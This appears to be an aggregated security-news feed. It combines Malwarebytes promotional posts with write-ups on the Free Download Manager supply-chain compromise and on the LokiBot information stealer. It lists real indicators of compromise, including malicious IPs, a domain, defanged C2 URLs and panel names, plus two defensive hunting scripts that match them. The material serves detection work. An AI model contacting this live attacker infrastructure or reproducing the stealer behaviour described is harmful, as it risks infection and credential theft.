Data breaches may ultimately be out of your control, as you have to hope the organizations holding your personal data have the proper security measures in place to protect your information. However, there are cyber threats you can protect yourself from, and the ways to do so can be rather easy to follow. By keeping […]
The post Apple issues patches to address vulnerabilities; Malware targets Android devices appeared first on BlackCloak | Protect Your Digital Life™.
We released version 1.2 of the Malwarebytes Admin app for iOS and Android last week, adding new Detection features that make it easier to see and manage threats.
Designed as a companion to the Nebula console, Malwarebytes Admin allows administrators to quickly review, investigate, and resolve security issues in just a few taps. The latest version of the app features major new additions such as a Detections Screen, a Detections details screen, and dashboard filters.
With this update, customers get a detailed look at malicious activity in their environment so they can quickly spot and take action on infected endpoints. Let’s take a look at the new additions!
Dashboard View
In the dashboard view, scroll down to see the widget for latest Detections by category.
Detections Screen
The Detections Screen allows Nebula administrators to see all of the detections in their environment. For each item in the detections list, admins can see:
Threat Name
Action Taken
Category (Malware, PUP, etc.)
Endpoint Name
Administrators are also able to filter detections by Endpoint Name, Threat Name, Action Taken, Category, and more. Filtering by date options, such as Today, Yesterday, Last 7 days, and so on, are also available.
Detections Individual Screen
On the Detections Individual Screen, Nebula administrators can view further details for individual detections by tapping on one of them. Endpoint actions are also available on the Detections Individual Screen.
Detections on Individual Endpoint Screen
Admins are able to navigate from the individual endpoint screen to a list of detections for that endpoint. The same filters from the Detections screen apply here.
Try Malwarebytes Admin today
No more having to make a beeline out of the bathtub to resolve critical alerts. Receive instant notifications on your phone and quickly review, investigate, and resolve issues in just a few taps—now with new Detection features to further streamline threat management.
Download the app for iOS or Android today and experience the convenience of having the power of Nebula right in your pocket.
Malwarebytes Managed Detection and Response (MDR) earned a place in 12 of G2’s Fall 2023 reports, winning badges for “Easiest to do Business With,” “Best Est. ROI,” “Easiest to Use,” and “Easiest Admin.”
Purpose-built for resource constrained teams, Malwarebytes MDR provides IT staff with high-focus alert monitoring and prioritization with flexible options for remediating threats.
Each quarter, the peer-to-peer review source G2 releases reports highlighting MDR products with the highest customer satisfaction and strongest market presence. Badges are awarded to products that receive the highest overall ratings among certain categories, including the most satisfied customers.
Let’s take a closer look at what real users said about using Malwarebytes MDR.
Easiest to Use, Easiest Admin
Malwarebytes MDR builds on the award-winning user experience of Malwarebytes Endpoint Detection and Response (EDR), enabling customers to seamlessly communicate with Malwarebytes MDR Analysts for recommendation and guidance.
On the Mid-Market Usability Index for Managed Detection and Response (MDR) in Fall 2023, G2 users rated Malwarebytes MDR several points above the industry average on the “Ease of Use” and “Ease of Admin” sub-scores.
“Malwarebytes MDR is simple to deploy and manage. They increase our security posture, meet cyber security insurance requirements, and make a great partner to augment my small IT team.”
Steve S.
“Malwarebytes MDR enables us to meet the need for 24×7 coverage with professional security experts who work in the industry every day.”
Matthew Verniere, IT Project Manager
Best Est. ROI
Malwarebytes MDR earned a “Best Estimated ROI” badge on the Mid-Market Results Index for Managed Detection and Response (MDR) in Fall 2023. Based on the survey results, customers with Malwarebytes MDR wait half as long as the industry average to go live and see ROI.
“Cyber threats are 24/7, and my team needs to sleep. The MDR team watching our network around-the-clock gives us a chance to sleep without worry. With Malwarebytes MDR backing us up, I also finally got to step away and take a two-week vacation. I’m just glad to know that we have a security team watching over our shoulders and making sure it’s all clear.”
Dennis Davis, IT Systems Manager
Experience Malwarebytes MDR: Award-winning ROI, user-friendly, and effective threat defense
Malwarebytes MDR provides IT staff with award-winning business protection, offering 24×7 alert monitoring and guidance, active remediation, and threat hunting across endpoints.
Try Malwarebytes MDR today and join the ranks of those who have already discovered the amazing results, support, and ROI of our exceptional managed service solutions: https://try.malwarebytes.com/mdr-consultation-new/
Get a Malwarebytes MDR quote
Read front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:
Tracking down a trojan: An inside look at threat hunting in a corporate network
Understanding ransomware reinfection: An MDR case study
Additional reading:
How to choose an MDR vendor: 6 questions to ask
Is an outsourced SOC worth it? Looking at the ROI of MDR
3 ways MDR can drive business growth for MSPs
Cyber threat hunting for SMBs: How MDR can help
An authentic-looking page and an almost genuine URL can be enough to entice users to download malicious software.
An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).
Highlights:
Check Point Research (CPR) recently discovered an active campaign deploying a new variant of the BBTok banking malware in Latin America.
Originally exposed in 2020, the newly discovered variant of the malware replicates the interfaces of over 40 Mexican and Brazilian banks, and tricks the infected victims into entering the 2FA code for their bank accounts or their payment card number.
Over time, the cybercriminals behind the malware have actively maintained diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL […]
The post Check Point Research exposes new versions of the BBTok banking malware, which targets clients of over 40 Mexican and Brazilian banks appeared first on Check Point Blog.
In a public announcement, Free Download Manager has acknowledged that a specific web page on its site was compromised by a Ukrainian cybercrime group, exploiting it to distribute malware.
Free Download Manager is—unsurprisingly—a download manager for Windows, macOS, Android, and Linux that allows users to manage their downloads and lets them grab large files, torrents, music, and videos.
In the announcement the service says the actual security incident took place in 2020. So why was the issue only recently discovered?
First and foremost, the cybercriminals only redirected users that aimed for the Linux version of the software.
Not all of these visitors were redirected to the malicious domain. They were “fingerprinted” based on as yet unknown criteria and only some were served the malicious Debian package. According to Free Download Manager the compromised website contained an exception list of IP addresses from various subnets, including those associated with Bing and Google. Visitors from these IP addresses were always given the correct download link.
Furthermore, the victims received a fully functional Free Download Manager, so they had no reason to assume that something was amiss, even though some users reported errors that said “Waiting for process: crond” when they tried to shut down or reboot their system.
According to the statement made by Free Download Manager:
“It’s estimated that much less than 0.1% of our visitors might have encountered this issue.”
The number of victims might have been even lower, were it not for the fact that several posts on social media, Reddit, StackOverflow, YouTube, and Unix Stack Exchange pointed to the malicious domain as a reliable source for getting the Free Download Manager tool.
Unfortunately, malware scanners for Linux are considered useless by many home users, and only some companies add them to their endpoint security solution. So, there is not much overlap to be expected between the users of Free Download Manager and those that have deployed an anti-malware solution for Linux systems.
Debian packages are typically used to install software on Debian-based Linux distributions, including Ubuntu. The malicious package dropped an information-stealing script and a crond backdoor that opened a reverse shell to the C2 server. Crond is the daemon that executes cron jobs in the background: a service process that runs automated tasks (cron jobs) according to a specified schedule, which is what makes the name a convenient disguise for a persistent backdoor.
The stealer in question was after system information, browsing history, saved passwords, cryptocurrency wallet files, as well as credentials for cloud services (AWS, Google Cloud, Oracle Cloud Infrastructure, Azure).
Remediation
The compromised Free Download Manager website has been replaced. All the Free Download Manager users who downloaded FDM for Linux between 2020 and 2022 should scan their computers for malware.
Malwarebytes Browser Guard users will receive a warning when they try to visit this domain.
Browser Guard blocks fdmpkg.org
Indicators of Compromise (IOCs):
File hashes (SHA-256):
b77f63f14d0b2bde3f4f62f4323aad87194da11d71c117a487e18ff3f2cd468d
2214c7a0256f07ce7b7aab8f61ef9cbaff10a456c8b9f2a97d8f713abd660349
93358bfb6ee0caced889e94cd82f6f417965087203ca9a5fce8dc7f6e1b8a3ea
d73be6e13732d365412d71791e5eb1096c7bb13d6f7fd533d8c04392ca0b69b5
File locations:
/etc/cron.d/collect
/var/tmp/crond
/var/tmp/bs
/var/tmp/atd
IP and domain:
172.111.48.101
fdmpkg.org
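The IOC list above is the raw material for a host check. The following script is an added example, not code from Malwarebytes or Free Download Manager: it takes the file paths, SHA-256 hashes and network indicators exactly as published above, reports any IOC path that exists on the host (with a hash match treated as definitive and a bare path match as something to inspect), and greps free text such as cron files or proxy logs for the domain and IP. The `demo()` function builds a throwaway directory with constructed stand-in files so the logic can be exercised without touching a real system; its cron entry, binary content and log lines are all constructed.

```python
import hashlib
import os
import tempfile

# Indicators copied from the Free Download Manager write-up above.
FDM_IOC_SHA256 = {
    "b77f63f14d0b2bde3f4f62f4323aad87194da11d71c117a487e18ff3f2cd468d",
    "2214c7a0256f07ce7b7aab8f61ef9cbaff10a456c8b9f2a97d8f713abd660349",
    "93358bfb6ee0caced889e94cd82f6f417965087203ca9a5fce8dc7f6e1b8a3ea",
    "d73be6e13732d365412d71791e5eb1096c7bb13d6f7fd533d8c04392ca0b69b5",
}
FDM_IOC_PATHS = ["/etc/cron.d/collect", "/var/tmp/crond", "/var/tmp/bs", "/var/tmp/atd"]
FDM_IOC_NETWORK = {"172.111.48.101", "fdmpkg.org"}


def sha256_of_file(path):
    """Stream the file through SHA-256 so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_paths(paths, known_hashes=FDM_IOC_SHA256):
    """Return (path, reason) for every IOC path that exists on the host.

    A hash match is definitive. A path that merely exists is still reported,
    because the dropper may have changed since the hashes were published and
    a legitimate cron daemon does not live in /var/tmp.
    """
    findings = []
    for path in paths:
        if not os.path.lexists(path):
            continue
        if os.path.isfile(path):
            digest = sha256_of_file(path)
            if digest in known_hashes:
                findings.append((path, "sha256 matches published IOC " + digest[:12] + "..."))
                continue
        findings.append((path, "IOC path present, hash not in list: inspect manually"))
    return findings


def find_network_iocs(text, indicators=FDM_IOC_NETWORK):
    """Return the network indicators that occur in free text (cron files, proxy logs, shell history)."""
    return sorted(ioc for ioc in indicators if ioc in text)


def demo():
    """Constructed demonstration: a throwaway directory stands in for /etc/cron.d and /var/tmp."""
    root = tempfile.mkdtemp(prefix="fdm-ioc-demo-")
    cron_file = os.path.join(root, "collect")
    crond_file = os.path.join(root, "crond")
    with open(cron_file, "w") as fh:
        # Constructed cron entry, not the real dropped file; it only needs to look like one.
        fh.write("*/5 * * * * root /var/tmp/crond >/dev/null 2>&1\n")
    with open(crond_file, "wb") as fh:
        fh.write(b"constructed stand-in for the dropped binary\n")
    # Extend the hash set with the stand-in's digest so the hash-match branch is exercised.
    hashes = FDM_IOC_SHA256 | {sha256_of_file(crond_file)}
    findings = scan_paths([cron_file, crond_file, os.path.join(root, "atd")], hashes)
    # Constructed proxy log lines; the second records a fetch from the IOC domain.
    proxy_log = (
        "2023-09-20T08:00:01Z 10.0.0.7 GET https://example.test/download.htm 200\n"
        "2023-09-20T08:00:03Z 10.0.0.7 GET http://fdmpkg.org/freedownloadmanager.deb 200\n"
    )
    return {"findings": findings, "network": find_network_iocs(proxy_log)}


if __name__ == "__main__":
    # Real run: check the published paths on this host, then show the constructed demo.
    for path, reason in scan_paths(FDM_IOC_PATHS):
        print(f"{path}: {reason}")
    print(demo())
```

Run it as root on a Linux host that installed FDM between 2020 and 2022; an empty result from `scan_paths(FDM_IOC_PATHS)` is only negative evidence for these specific indicators, so the full malware scan the article recommends is still the right follow-up.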
Malwarebytes EDR and MDR remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
The AI race is on! It’s easy to lose track of the latest developments and possibilities, and yet everyone wants to see firsthand what the hype is about. Heydays for cybercriminals!
The peer-to-peer review source G2 has released their Fall 2023 reports, ranking Malwarebytes as a leader across a number of endpoint protection categories. In the most recent results, Malwarebytes is the only vendor to earn the “Easiest to Use” and “Easiest Admin” recognition for its Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR).
Based on verified customer reviews, Malwarebytes has been ranked #1 over top EDR vendors for endpoint malware and antivirus protection, detection and remediation of web-based threats, product usability, and more. These results continue Malwarebytes’ top ranking by G2, reinforcing Malwarebytes’ leadership in the endpoint security platform market.
Badges are awarded to products that receive the highest overall ratings among certain categories including most satisfied customers. For example, the Best Usability badge goes to the single product with the highest overall usability score. Also of note is G2’s “Grid” reports, which represent which vendors have the most satisfied customers, largest presence in the market, and other factors.
How did Malwarebytes perform in G2 Fall 2023?
Malwarebytes EDR is a Leader in the “EDR Grid” overall, and for mid-market.
Real users ranked Malwarebytes as the most usable EDR solution (#1 in the Mid-market Usability Grid)
Badges: Easiest to Use, Best Usability, Easiest Admin
In the Endpoint Protection Suites category, Malwarebytes is a Leader in overall and mid-market Grid reports.
#1 overall Usability index, underscoring Malwarebytes’ commitment to building effective solutions that are easy to deploy, use, and manage
Badges: Most Implementable, Easiest Setup, Best Results, Easiest to Use, Easiest Admin, Best Usability
In the Managed Detection and Response (MDR) category:
The Malwarebytes MDR solution provides 24×7 threat monitoring and investigations without the expense of building and running a SOC in-house.
Real users awarded Malwarebytes MDR with the Best ROI, Easiest to Use, and Easiest Admin badges
EDR that’s Easy to Use
Feedback from real users placed Malwarebytes EDR as the most user-friendly EDR solution available in the Mid-market Usability Index, with a Usability Score that surpasses the average across all vendors by almost 10 percent.
“If you are purchasing Malwarebytes, then you have made the correct choice. You will quickly see how easy it is to implement, and how great their support is.”
Mauro B.
“Very easy to install and deploy, setup, and configure – for instance – a 5 machine setup would take roughly ~10 mins from start to finish.”
Verified User
“Easy to use and implement, along with great support and support tools at your disposal, along with courses to help you become more familiar with the inner workings.”
Doug C.
#1 Endpoint Protection that’s Easy to Use and Effective
Malwarebytes Endpoint Protection proudly holds the #1 spot in the overall Usability index. Our Ease of Use, Ease of Admin, and Meets Requirements subscores for this category outpace the industry average by multiple percentage points.
“The Nebula console is one of the most user-friendly interfaces we’ve come across. We can’t recommend it enough.”
Justin N.
“Malwarebytes makes it simple to deploy. Additionally, the user interface has minimal impact on the end-user, so it’s win-win. Support are happy to help when you do hit the occasional bump and the portal is easy to use and very responsive.”
John K.
MDR with the Best ROI
Malwarebytes MDR placed in 12 of G2’s Fall 2023 reports, winning badges for “Easiest to do Business With”, “Best Est. ROI”, “Easiest to Use”, and “Easiest Admin”.
“Malwarebytes MDR is simple to deploy and manage. They increase our security posture, meet cyber security insurance requirements, and make a great partner to augment my small IT team.”
Steve S.
“We wanted to extend our SOC team with MDR services, and that has always been our vision with Malwarebytes since we look at the company as a partner, rather than a vendor. Malwarebytes MDR enables us to meet the need for 24 x7 coverage with professional security experts who work in the industry every day.”
Matthew Verniere, Richards Building Supply
“Cyber threats are 24/7, and my team needs to sleep. The MDR team watching our network around-the-clock gives us a chance to sleep without worry. With Malwarebytes MDR backing us up, I also finally got to step away and take a two-week vacation. I’m just glad to know that we have a security team watching over our shoulder and making sure it’s all clear.”
Dennis Davis, IT Systems Manager, Drummond
Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense
Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.
Try Malwarebytes EDR today and join the ranks of those who have already discovered the amazing results, support, ROI, and more of our exceptional endpoint security solutions.
Malwarebytes EDR and MDR are recognized as leaders in endpoint security by real, reputable customers. Want to learn more about how we can help protect your business? Get a free trial below.
MRG Effitas, a world leader in independent IT research, published their anti-malware efficacy assessment results for Q2 2023. Malwarebytes Endpoint Protection (EP) achieved the highest possible score (100%) and received certifications for Level 1, Exploit, Online Banking, and Ransomware.
These results mark the eighth time in a row we have received all certification awards, and we are now officially the only vendor to win every single certification & award in 2022 and so far into 2023.
MRG Effitas assesses a product’s ability to meet today’s most pressing threats, including stopping zero-day malware, ransomware, exploits, and more—and doing so with speedy performance and low false positives.
In addition to their normal tests, MRG Effitas added two new tests to their Q2 2023 360° Assessment & Certification: the ITW Phishing Test and the Phishing Simulator Test.
Malwarebytes blocked 100% of phishing attempts in BOTH the ITW Phishing Test and Phishing Simulator Test. In other words, Malwarebytes was the only vendor in the Q2 2023 MRG test to both receive all 4 award logos AND block 100% of phishing attempts.
How we were able to do it: The signature and behavior-based detection techniques and proprietary anti-exploit technology of Malwarebytes EP allowed it to detect and block more malware than any other competitor on the Q2 test. In addition, the Web protection layer of our EP blocks access to and from known or suspicious Internet addresses, allowing us to ace the phishing tests.
These results show that Malwarebytes EP, the foundation layer for our EDR and MDR solutions, provides reliable and comprehensive protection against a wide range of threats.
For the full results and to see how we stack up against competitors, our “Endpoint Security Evaluation Guide” eBook—based on MRG Effitas’ independent lab assessment—is an essential tool for any organization looking to make an informed decision about endpoint security. Download below!
GET THE ENDPOINT SECURITY EVALUATION GUIDE
Let’s dive into where we prevented more than the rest and how we were able to do it.
100% of phishing attempts blocked
Given the frequency and risks associated with phishing attacks today, it’s clear that modern endpoint security needs to protect against these attacks.
According to Verizon, attackers used phishing for initial access in 15% of data breaches in 2022. CISA also showed that, within the first 10 minutes of receiving a phishing email, 84% of employees took the bait. After successfully compromising a system through phishing, threat actors can further their attacks by dropping ransomware or stealing sensitive data, leading to costly financial and reputational damages.
Malwarebytes blocked 100% of phishing attempts in BOTH the ITW Phishing Test and Phishing Simulator Test.
How we were able to do it: Malwarebytes EP, the foundation for Malwarebytes EDR, features a Web protection layer that blocks access to and from known or suspicious Internet addresses.
100% of ransomware blocked
Using a blend of signature and signature-less technologies, the anti-ransomware layer of Malwarebytes EP constantly monitors endpoint systems and automatically kills processes associated with ransomware activity.
MRG Effitas tested security products for 30 ransomware samples. In addition, they tested four ransomware simulator samples created in-house, ensuring the security product could only rely on its behavior scanning modules. To test for false positives, a device running Malwarebytes EP also ran three benign programs designed to mimic ransomware behavior.
Malwarebytes blocked 100 percent of ransomware threats in the MRG Effitas assessment and did so with no false positives, allowing the three benign programs to run. For this we earned the 360° Ransomware Certification.
Nebula view of detected ransomware activity
100% of banking malware blocked
In 2021, 37% of banking malware attacks targeted corporate users.
We were one of the few vendors to earn a 360° Online Banking Certification, which means Malwarebytes EP stopped 100% of threats designed to steal financial information and money from victims’ accounts. To outperform the others, our unique detection technology again came into play.
Malwarebytes EP autoblocked 100% of the 25 financial malware samples, the Magecart credit card-skimming attack, and Botnets designed to steal credentials.
100% of zero-day threats blocked
One of the many strong suits of our detection is that it can detect malware that has never been seen before, also called zero-day malware. Again, we were one of the only vendors to detect and block these pernicious threats, which account for 80% of successful breaches.
Built on machine learning (ML) and behavioral analysis techniques, our behavior-based detection enabled Malwarebytes EP to detect and autoblock 100% of all zero-day threats. For this, as well as blocking all Botnets, we earned the 360° Level 1 Certification.
100% of exploits blocked
The anti-exploit feature of Malwarebytes EP protects organizations from one of the most advanced cyber attacks: zero-day exploits targeting browser and application vulnerabilities.
But don’t take our word for it: MRG Effitas used 8 different exploitation techniques to try to deliver a malicious payload on a device running Malwarebytes EP, and they didn’t get very far. Malwarebytes earned the 360° Exploit Certification for autoblocking 100% of Exploit/Fileless attacks, entirely protecting the system from infection.
We were one of the few to earn the 360° Exploit Certification all thanks to our proprietary anti-exploit technology, which wraps vulnerable programs in four defensive layers that prevent an exploit from installing its payload, or even executing initial shellcode.
Our four layers of exploit protection
Anti-exploit settings in Nebula
Consistency is key
If there is one shining takeaway from this accomplishment, it’s that consistency is key.
You don’t want a security solution that passes rigorous tests like MRG Effitas only some of the time. You want a solution that passes them with flying colors all of the time. Clearly, Malwarebytes EP, and by extension our EDR and MDR, is that solution.
For organizations that are concerned their current solution may not be up to par, the MRG Effitas assessment has demonstrated that Malwarebytes for Business, more consistently than anybody else, has what it takes to keep your business safe from today’s most pressing cyberthreats.
GET THE FULL RESULTS HERE
By Madalynn Carr
Report date: 09/07/2023
LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot was first advertised in 2015 on underground markets in Eastern Europe, however it was not common to see it in the wild until 2018. Since then, LokiBot has remained in the top five malware families delivered through phishing emails.
History
LokiBot first surfaced in March of 2015 on underground hacking forums, posted by a hacker with the alias “lokistov”, who is also known as “Carter”. This can be seen in Figure 1, where LokiBot was originally posted on an underground forum. LokiBot was originally advertised as a “Resident Loader and Password and CryptoCoin-wallet stealer.” It is assumed that lokistov is from a non-English speaking country, specifically an ex-USSR country. LokiBot was being sold for upwards of $450 USD (about $540 USD at the time this report was written), depending on whether the buyer wanted the stealer or the loader, as well as other add-ons such as a change in the C2 (Command and Control) IP address. After release, lokistov published an update every week until 2017, when lokistov released LokiBot V2. Since then, they have not updated the forums for LokiBot V1. Shortly after, around 2018, the LokiBot source code was leaked and is now being sold on forums for as low as $80 USD. There are two theories of how this happened. One is that somebody reversed the original LokiBot, recovered the source code, and then published the cracked version of the malware. The other theory is that lokistov was hacked, and the hacker published the stolen version.
Figure 1: Original Posting of LokiBot by Lokistov.
LokiBot became a popular malware choice for threat actors due to the low price and ease of use. Since then, lokistov has released LokiBot 2.0 and is currently selling it on underground forums. This newer version of the Information Stealer includes more evasive techniques and expands further into Keylogger, Remote Access Trojan (RAT), and even ransomware attributes.
Notable Uses
Because LokiBot has been around for a while, there have been a sizeable number of media pieces about LokiBot; however, none of them cover the campaigns that APT (Advanced Persistent Threat) groups are using this malware to conduct. The most recent use was in February of 2020, where LokiBot impersonated a Fortnite launcher, which was one of the most popular video games at the time.
Since LokiBot is simple, adaptable and easily accessible, this malware has remained in the top 5 malware families seen at Cofense since 2019. During 2019 and 2020, LokiBot was a high competitor for the top malware family seen, constantly switching places with the ever-popular Agent Tesla.
Capabilities
Although LokiBot originated as an Information Stealer, it has been cracked and edited several times. LokiBot can have RAT or keylogger capabilities. However, the majority of LokiBot seen in the wild only demonstrates Information Stealer capabilities. LokiBot is capable of stealing credentials from over 100 different clients, including but not limited to:
Email Clients
FTP Clients
VNC Clients
HTTP Browsers
Password Managers
IM Clients
Specific examples of what these applications are can be found in Table 1, however the list is not limited to just these specific applications.
Mozilla Firefox
Internet Explorer
Google Chrome
K-Meleon
Comodo Dragon
SeaMonkey
Safari
CoolNovo
Opera
Chromium
Titan Browser
Yandex Browser
Superbird Browser
Chrome Canary
Waterfox
Flash FXP
Nexus File
JaSFtp
Syncovery
Remmina RDP
FileZilla
CyberDuck
NovaFTP
FTPShell
NETFile
mSecure Wallet
Fling
KiTTY
PuTTY
WinSCP
Outlook
Mozilla Thunderbird
Pocomail
Gmail Notifier Pro
yMail
Pidgin
AI RoboForm
KeePass
EnPass
1Password
Table 1: List of examples that LokiBot has the capability to steal from.
In the Wild
LokiBot has always been seen at Cofense as one of the most popular malware families used by threat actors. Due to its simplistic nature and usage, low-skill threat actors can use LokiBot for a variety of malicious purposes. In 2019 up until around 2021, LokiBot would often be the most common malware family, followed by Agent Tesla Keylogger. At the time of this report, other malware families have appeared more often, and therefore pushed LokiBot down in the rankings. However, LokiBot is still in the top five malware families seen at Cofense. Figure 2 shows the percentage of LokiBot malware seen among other malware families in our Active Threat Reports (ATR), and although there was a small dip over the past year and a half, LokiBot has remained around eight percent of all malware seen each month.
Figure 2: Loki Bot’s relative value seen at Cofense between January 2022 and July 2023.
Delivery Mechanisms
LokiBot is often seen by itself when it is delivered via email, however, as can be seen in Figure 2, there is still quite a large amount of LokiBot that is accompanied by a delivery mechanism. Out of the delivery mechanisms seen by Cofense, an overwhelming 82% of LokiBot accompanied by a delivery mechanism is delivered by CVE-2017-11882. However, out of all the LokiBot samples seen by Cofense, over half of the LokiBots are seen delivered as a direct attachment.
Figure 3: Delivery Mechanisms used to deliver Loki Bot between January 2022 and July 2023.
Very rarely is LokiBot delivered via embedded URLs or delivery mechanisms other than CVE-2017-11882, such as Visual Basic Scripts (VBS) or Windows Shortcut Files (LNK): just over one percent of LokiBot samples were delivered via those two mechanisms combined between January 2022 and July 2023.
Behavior
LokiBot has a very straightforward and simplistic way of behaving. Once LokiBot has been downloaded and run, LokiBot will unpack itself onto the system. From there, this malware will start collecting sensitive information from each of the programs it supports gathering information from. Once LokiBot has exhausted all the possible applications that can give the sensitive data, as well as any extra additions such as keystroke logging, it will create a customized HTTP packet and send it to the C2, as seen in Figure 4. As LokiBot is gathering the information into an HTTP packet, some versions of LokiBot will start to maintain persistence, while others may continue to run and occasionally connect in case any new credentials are stored on the machine.
Figure 4: Example of an HTTP POST request from a computer infected with LokiBot.
This specific link is the final destination, where the information is presented to the threat actor. If one were to visit the page, they would be greeted with a captcha as well as a login page as seen in Figure 5.
Figure 5: Example of a LokiBot C2 Authentication Panel.
Detection and Hunting
LokiBot depends heavily on connecting to its C2, which makes it generally easy to detect. Because embedded URLs rarely deliver LokiBot, the primary way to prevent LokiBot from being installed on a system is to block unknown downloads from suspicious emails. Most anti-virus software is good at catching LokiBot due to its simplicity, but there are also other ways to spot whether LokiBot is already installed on a system.
User Agent
LokiBot can also be identified by a specific string found in the application as well as the network traffic. LokiBot will always use the User Agent “Mozilla/4.08 (Charon; Inferno)” to connect to its C2s, as seen in Figure 4.
Network Traffic
As previously mentioned, LokiBot uses the User Agent “Mozilla/4.08 (Charon; Inferno)” to post the credentials to its C2 panel. LokiBot primarily uses HTTP to communicate with its C2. There are a variety of ways the URL can be formatted, but the file the link accesses is typically a PHP panel, or the URL ends with “p=” followed by a unique set of numbers that differentiates the systems LokiBot has infected. An example of the latter that Cofense has previously reported is:
hxxp://216[.]128[.]145[.]196/~wellseconds/?p=
A more common example is the other IOC mentioned, the PHP panel, whose URL looks similar to:
hxxp://194[.]55[.]224[.]9/fresh1/five/fre[.]php
fre.php
gate.php
aaaj.php
nimda.php
ight.php
crkk.php
free.php
wish.php
base.php
fred.php
mono.php
mime.php
Table 3: Examples of PHP Panels that have been seen as a C2 for Loki Bot.
The examples listed in Table 3 are not an exhaustive list of all panel PHPs as LokiBot can change the name of the PHP panel. However, the majority of LokiBot will use “fre.php” when connecting to its host.
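The User Agent, Network Traffic and Table 3 sections describe three network indicators: the fixed “Mozilla/4.08 (Charon; Inferno)” User Agent, the PHP panel file names, and the “p=” numeric victim identifier. The script below is an added example, not code from Cofense: it scores constructed proxy-log lines against those three indicators. The log format (tab-separated time, client, method, URL, status, User Agent), the client addresses, and the server addresses in the 203.0.113.0/24 documentation range are all constructed; the function names `hunt`, `score_request` and `likely_infected` are mine. The User Agent is treated as the strong signal; a panel name or `p=` alone only earns a “review” verdict, since the report notes the panel can be renamed and names such as `gate.php` are generic.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the report above.
LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
PANEL_NAMES = {
    "fre.php", "gate.php", "aaaj.php", "nimda.php", "ight.php", "crkk.php",
    "free.php", "wish.php", "base.php", "fred.php", "mono.php", "mime.php",
}
# The "?p=<digits>" victim identifier described in the Network Traffic section.
P_PARAM = re.compile(r"(?:^|&)p=\d+(?:&|$)")

# Constructed proxy log, tab-separated: time, client, method, url, status, user-agent.
# Server addresses use the 203.0.113.0/24 documentation range, not real C2 hosts.
SAMPLE_LOG = """\
2023-09-07T10:01:02Z\t10.0.0.12\tPOST\thttp://203.0.113.5/fresh1/five/fre.php\t200\tMozilla/4.08 (Charon; Inferno)
2023-09-07T10:02:10Z\t10.0.0.15\tGET\thttp://203.0.113.9/~wellseconds/?p=1234567\t200\tMozilla/5.0 (Windows NT 10.0; rv:117.0) Gecko/20100101 Firefox/117.0
2023-09-07T10:03:44Z\t10.0.0.20\tGET\thttp://example.test/index.php\t200\tMozilla/5.0 (Windows NT 10.0) Chrome/116.0
2023-09-07T10:04:01Z\t10.0.0.12\tPOST\thttp://203.0.113.5/panel/gate.php\t200\tMozilla/4.08 (Charon; Inferno)
2023-09-07T10:05:30Z\t10.0.0.33\tPOST\thttp://example.test/upload/gate.php\t200\tMozilla/5.0 (X11; Linux x86_64)
"""


def parse_line(line):
    """Split one tab-separated log line into a record; the user-agent may itself contain spaces."""
    time, client, method, url, status, ua = line.split("\t", 5)
    return {"time": time, "client": client, "method": method, "url": url, "status": status, "ua": ua}


def score_request(rec):
    """Return (verdict, reasons).

    The user-agent is the strong indicator and yields 'high'. URL shape alone
    (panel file name or numeric p= parameter) yields 'review', because those
    names are generic and the report says LokiBot can rename its panel.
    """
    reasons = []
    ua_hit = rec["ua"] == LOKIBOT_USER_AGENT
    if ua_hit:
        reasons.append("user-agent is the fixed LokiBot string")
    parts = urlsplit(rec["url"])
    leaf = parts.path.rsplit("/", 1)[-1]
    if leaf in PANEL_NAMES:
        reasons.append(f"request targets known panel name {leaf}")
    if P_PARAM.search(parts.query):
        reasons.append("query carries a numeric p= victim identifier")
    if not reasons:
        return "none", reasons
    if rec["method"] == "POST":
        reasons.append("POST, consistent with credential exfiltration")
    return ("high" if ua_hit else "review"), reasons


def hunt(log_text):
    """Score every log line and keep those showing any LokiBot indicator."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        verdict, reasons = score_request(rec)
        if verdict != "none":
            hits.append({"client": rec["client"], "url": rec["url"], "verdict": verdict, "reasons": reasons})
    return hits


def likely_infected(hits):
    """Clients with at least one high-confidence hit: the hosts to isolate and image first."""
    return sorted({h["client"] for h in hits if h["verdict"] == "high"})


if __name__ == "__main__":
    results = hunt(SAMPLE_LOG)
    for h in results:
        print(h["verdict"].upper(), h["client"], h["url"], "; ".join(h["reasons"]))
    print("isolate:", likely_infected(results))
```

On the constructed log this flags four of the five lines: the two requests from 10.0.0.12 are high-confidence because of the User Agent, while the `?p=` beacon and the unrelated `gate.php` upload are only marked for review. Adapting it to a real proxy or web-server log means changing `parse_line` to that log's field layout; the indicator logic stays the same.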
The post LokiBot – Phishing Malware Baseline appeared first on Cofense.
By Madalynn Carr
Report date: 09/07/2023
LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot was first advertised in 2015 on underground markets in Eastern Europe, however it was not common to see it in the wild until 2018. Since then, LokiBot has remained in the top five malware families delivered through phishing emails.
History
